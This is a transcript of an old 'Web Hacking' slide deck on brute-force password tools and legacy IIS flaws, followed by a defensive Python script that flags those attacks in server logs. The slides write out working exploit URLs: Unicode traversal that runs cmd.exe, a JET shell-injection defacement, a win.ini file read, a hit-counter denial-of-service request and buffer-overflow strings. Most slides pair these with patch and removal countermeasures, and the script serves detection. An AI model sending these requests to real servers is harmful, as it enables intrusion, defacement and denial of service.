
Web Hacking


joy

Presentation Transcript


  1. Web Hacking • Brute Force Password Guessing • Vulnerabilities • IIS • …..

  2. Brute Force Password Guessing • Tools • Brutus, http://www.hoobie.net/brutus/brutus-download.html • “Dictionary file”

  3. IIS Vulnerability • Catalog_type.asp • NT ODBC Remote Compromise • Vulnerability of “JET data base engine” (for Windows NT) • SQL query +|shell(”instruction”) • |http://ipaddress/AdvWorks/equipment/catalog_type.asp?ProductType=|shell(“cmd+/c+echo Hacked By Somebody >c:\..default.html”)| • Code.asp • A problem with String Matching • /ADvWorks, /ASPSamp • http://ipaddress/AdvWorks/code.asp?source=/AdvWorks/../../../winnt/win.ini • Countermeasure • Remove these ASP

  4. IIS vulnerability: FPcount • DoS attack • http://ip address/_vti_bin/fpcount.exe?Page=default.htm|image=1Digits=20000 • Reserves 476K per request • Countermeasure • Remove fpcount.exe

  5. IIS vulnerability: IIS Unicode • %C1%9c → Unicode “\” • http://ipaddress/scripts/..%c1%9c..\winnt\system32\cmd.exe?/c+dir • /scripts: IIS’s default setting for this folder is executable • Consequence: do everything they want, include

  6. Countermeasure of Web Hacking • Do not use IIS (refer to appendix A) • Patch your Web Server • Remove unnecessary services • IIS examples • Fpcount • ….. (check IIS vulnerability list)

  7. They had been hacked

  8. Services: Port scan

  9. What N-map got

  10. Found “Unicode vulnerability”

  11. Evade IIS’s check

  12. Bingo: change again

  13. Hey! Web page back

  14. Loss again

  15. IIS vulnerability: MDAC/RDS • Msadcs.dll (same as Catalog_type.asp) • Countermeasure • Patch document number: MS99-025 • Remove it, if you don’t need it • Patch it, if you need it • Version of MDAC (check Msdadc.dll, Oledb32.dll) • MDAC 1.5 • Upgrade to 2.1 • handlerRequired (set DWORD value to 1) • MDAC 2.0 • handlerRequired (set DWORD value to 1) • Delete RDS examples

  16. IIS vulnerability: FrontPage98 dvwssr.dll • Source code of ASP • Assumption: right to modify homepage • Encryption: (key: Netscape engineers are weenies) • Tool: dvwssr.exe (Perl code, written by “Rain Forest Puppy”) • Buffer overflow • http://ip address/GET/_vti_aut/dvssr.dll?aaaaa…(5,000 “a” or whatever) • Countermeasure: remove dvwssr.dll directly, or install Windows 2000, Office 2000 extension, FrontPage 2000 Server Extensions (removes dvwssr.dll automatically)

  17. IIS vulnerability: Malformed HTR Request (MS99-019) • ISM.DLL (Buffer overflow) • .htr • http://ip address/aaaa…aaaaaaaaaaaaaa.htr (about 3,000 a)
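
A defensive sketch of how the request shapes on slides 3, 4, 5, 16 and 17 can be flagged in a web server log, added here as an example and not part of the original presentation. The "client method uri" log layout, the rule names and the `MAX_URI` and `MAX_DIGITS` thresholds are assumptions; the key step is canonicalising the URI before checking it, which is the check the Unicode encoding on slide 5 gets past.

```python
import re
from urllib.parse import unquote_to_bytes

MAX_URI = 1024      # assumed limit; the slides' overflow requests are ~3,000-5,000 bytes
MAX_DIGITS = 10     # assumed sane ceiling for a hit counter's Digits parameter
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")   # 2-byte UTF-8 encoding an ASCII char

def canonicalise(uri: str) -> bytes:
    """Percent-decode, fold overlong UTF-8 to the ASCII byte it aliases, unify slashes."""
    raw = unquote_to_bytes(uri)
    folded = OVERLONG.sub(lambda m: bytes([((m[0][0] & 0x1F) << 6) | (m[0][1] & 0x3F)]), raw)
    return folded.replace(b"\\", b"/").lower()

def classify(uri: str) -> list:
    """Return the sorted names of the rules a request URI triggers."""
    hits = set()
    canon = canonicalise(uri)
    if OVERLONG.search(unquote_to_bytes(uri)):
        hits.add("overlong-utf8")            # slide 5: %c1%9c decodes to "\"
    if re.search(rb"(^|[/=])\.\.(/|$)", canon):
        hits.add("path-traversal")           # slides 3 and 5: ../ after decoding
    if b"|shell(" in canon:
        hits.add("jet-shell-pipe")           # slide 3: |shell(...) in a query value
    if len(uri) > MAX_URI:
        hits.add("oversized-uri")            # slides 16-17: very long .dll/.htr requests
    m = re.search(rb"fpcount\.exe\?.*digits=(\d+)", canon)
    if m and int(m[1]) > MAX_DIGITS:
        hits.add("fpcount-digits")           # slide 4: Digits=20000
    return sorted(hits)

def scan(log_lines):
    """Yield (client, uri, rules) for each 'client method uri' line that triggers a rule."""
    for line in log_lines:
        client, _method, uri = line.split(" ", 2)
        rules = classify(uri)
        if rules:
            yield client, uri, rules

# Constructed sample log (client method uri); URIs reuse the request shapes on the slides.
SAMPLE_LOG = [
    "192.0.2.10 GET /default.htm",
    r"192.0.2.11 GET /scripts/..%c1%9c..\winnt\system32\cmd.exe?/c+dir",
    "192.0.2.12 GET /AdvWorks/code.asp?source=/AdvWorks/../../../winnt/win.ini",
    "192.0.2.13 GET /_vti_bin/fpcount.exe?Page=default.htm|image=1Digits=20000",
    "192.0.2.14 GET /" + "a" * 3000 + ".htr",
]

if __name__ == "__main__":
    for client, uri, rules in scan(SAMPLE_LOG):
        print(client, rules, uri[:60])
```
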
